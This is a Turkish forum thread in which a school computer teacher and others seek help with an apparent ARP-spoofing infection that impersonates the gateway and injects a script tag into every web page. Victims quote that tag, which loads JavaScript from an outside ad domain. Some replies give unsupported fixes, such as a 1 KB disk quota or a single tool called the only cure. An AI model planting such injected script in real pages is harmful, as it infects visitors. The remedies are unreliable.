Çok Tehlikeli Ağ Virüsü

Kodla Büyü

gcapan

Site Gezgini
merhaba arkadaşlar,

okulda 3-4 gündür virüslerle uğraşıyorum. ama tam olarak temizleyemedim. yeni bir sistem kuruyorum ancak anında virüs ona da bulaşıyor. Virüs ağdaki bir veya birkaç bilgisayardan bulaşıyor. ilk olarak nasıl bulaştı bilmiyorum. Ama şuanda temiz bir sistemi açıp internette herhangi bir sayfaya girdiğimde virüs o bilgisayara da bulaşıyor. çünkü gelen sayfanın içerisinde şu bilgi yer alıyor :

<script language="javascript" SRC="http://ad.userads.info/ads.js"></script>

her sayfanın içerisinde bu bilgi yerleştiriliyor. peki o zaman modemime mi virüs bulaştı ? hayır ama modeme ulaşmaya çalıştığımda bilgisayar aslında bazen modem yerine virüslü bilgisayara ulaşmaya çalışıyorum. yani virüs modem i taklit ediyor.

virüs ün bulaştığı bilgisayar aynı mac adreslere sahip bir ip daha oluşturuyor ve aynı networkte birden fazla aynı ip numarası oluyor. ( modem için ) yani modemimin ip adresi 192.168.1.1 ise ağda kaç virüslü bilgisayar varsa o kadar da ağ geçidi oluyor (192.168.1.1)

virüslü bilgisayarı şöyle tespit edebilirsiniz.
çalıştırdan "cmd" yazıp command promt a girin.

arp -a

komutunu verin.

aşağıdakine benzer bir çıktı alıyorsanız. virüs o bilgisayarda vardır.
---------------------------------------
Arabirim: 192.168.1.2 --- 0x10003
Internet Adresi Fiziksel Adres Tipi
192.168.1.1 00-0d-87-a8-b0-d8 dinamik
192.168.1.4 00-0d-87-a8-b0-d8 dinamik
192.168.1.20 00-1b-fc-da-74-fd dinamik
-------------------------------------------

eğer bir internet sayfası açarsanız; virüs programınız virüs bulduysa ve windows kod merkezi , adress book viewer başlıklı hata mesajarı alıyorsanız ağınızdaki bir bilgisayarda virüs vardır. hata mesajlarının resimlerini ekliyecem.

virüsün ismini bilmiyorum ama virüs programlarının ağdaki bilgisayarlarda buldukları virüs isimleri şöyle : almanahe (alman.b), malware.sbdldg, exp/flash.gen[exploit], hiddenext, crypt.xdr.gen.

ben almanahe den şüpheleniyorum.

virüs hosts dosyasınıda değiştirip bir sürü adres ekliyor hosts dosyasının boyutu 200 kb lara kadar çıkıyor (normalde 1kb). ağın yavaşlamasına ağdaki bilgisayarların internetteki sayfaları çok yavaş açmasına hatta bazen internet browserınızın kitlenmesine yol açıyor.

daha önceden bu virüsle karşılaşan kimse var mı ? ağımı bu virüsten nasıl kurtarabilirim?
şimdiden teşekkürler . . .

yanlışlarım varsa lütfen düzeltin arkadaşlar.

iyi çalışmalarr
------------------------------------------------------------------------------------
Ağdaki bilgisayarlarda java programcıklarının çalışmasını devre dışı bırakırsanız o bilgisayarlarda sorunsuz bir şekilde internete girebilirsiniz. Eğer kapatmazsanız Virüs programları internette gezinirken sürekli virüs buluyor.
İE' de araçlar>internet seçenekleri>güvenlik>özel düzey> Komut Dosyası kısmında java programcıklarının çalıştırılması Devre dışı bırak seçeneğini seçin. Tamam Tamam diyerek pencereleri kapatın.

hocam aynı virüsle bende 2 gündür uğraşıyorum ama sorunu bir türlü çözemedim.bu bir oyundan kaynaklanan bir virüs gibi düşünüyorum. sorunla karşılaşan ve çözen arkadaş varsa yardımcı olurlarsa sevinirim

Hijackthis programını denemenizi öneririm fakat ağda bulaşan bir virüs yada trojen ise hub'a bağlı bilgisayarları tek tek temizleyin yani tüm bilg. kapatıp sadece o bilg. açıp temizleyin eğer işe yararsa bilg. kapatıp başka bir bilg. temizlemeye geçin. Nacizane bir öneri daha incelemdim ama www.virustemizligi.com adlı siteye bir göz atın belki sorunu orda çözebilirsiniz.Ben bu siteden faydalanmıştım...

Arkadaşlar bu virüs yüzünden şu anda okulun net bağlantısını kestim. Bir el atsanızda çözsek şu sorunu. Okulda nete giremiyorum. Ve tüm okulda giremiyor. (Bilgisayar öğretmeniyim ya çözemeyince sorunu "nasıl bilgisayar öğretmenisin sen" durumlarına düşüyorum. rezil de oluyoruz yani)

mirayabravci' Alıntı:
Arkadaşlar bu virüs yüzünden şu anda okulun net bağlantısını kestim. Bir el atsanızda çözsek şu sorunu. Okulda nete giremiyorum. Ve tüm okulda giremiyor. (Bilgisayar öğretmeniyim ya çözemeyince sorunu "nasıl bilgisayar öğretmenisin sen" durumlarına düşüyorum. rezil de oluyoruz yani)

hocam ben söyle çözdüm problemi öncelikle harddiskin kotasını 1 kb yaptım sonrasınında AVG anti syware ile tarattım bi tane malware buldu sildim arkadasından kullandığım modem airteis 205 sitesinden firewall ini güncelledim bilgisayarım ve modemi yeniden başladım sorun çözüldü saygılar hocam.

bizim kuruma da bulaşmıştı bu virüs. kaspersky ve nod32 yüklü bilgisayarlar ayakta kalabildiler. saldırıyı kasper uyarıyordu her int. sayfası açılışında. zaten ondan sonra kasper kullanmaya karar verdim :)

herhangi bir internet sayfasının kaynağını görüntülediğinizde en üst satırda "<script language="javascript" SRC="http://ad.userads.info/ads.js"></script>" kodu varsa virüs bilgisayarınızdadır. habire resim dosyası oluşturur. normal antivirüsler sürekkli oluşan bu resim dosyalarını bhulabiliyorlar ve onları silmekle uğraşıyorlar. kaynağını engelleyemiyorlar. avast ve avg çaresiz kalmıştı mesela, virüsün oluşturduğu resim dosyalarını bulup siliyorlardı ama bi anlam ifade etmiyor çünkü habire yenisi oluşuyordu.

ağda çok güzel yayılan bir virüs. bulaşan kurumlarda çalışan arkadaşlara Allah kolaylık versin...

tuberks' Alıntı:
mirayabravci' Alıntı:

hocam ben söyle çözdüm problemi öncelikle harddiskin kotasını 1 kb yaptım sonrasınında AVG anti syware ile tarattım bi tane malware buldu sildim arkadasından kullandığım modem airteis 205 sitesinden firewall ini güncelledim bilgisayarım ve modemi yeniden başladım sorun çözüldü saygılar hocam.

harddiskin kotasını nasıl 1kb yapıyoruz. ben de aynı durumla karşı karşıyayım

tuberks' Alıntı:
mirayabravci' Alıntı:

harddiskin kotasını nasıl 1kb yapıyoruz. ben de aynı durumla karşı karşıyayım

sürücünün üzerine gelip sağ tıkılıyorsun özelliklerden açılan pencereden yukarıda kota yazıyor oraya gelip kotayıı aktif edip bu kotayı sınırını aşan kullanıcılara izinverme diyorsun 1kb yapıyorsun :wink:

arkadaşım sorunun tek çözümü var başkada yok ne yaparsanız yapın başkada çözümüyok sadece 1 çözümü var oda AntiARP 5.0.1 gerisi hikaye önce pcnizi formatlayın sonra antiarp yukleyın bidaha sorun cıkarsa bana ulaşın :+1:

Geri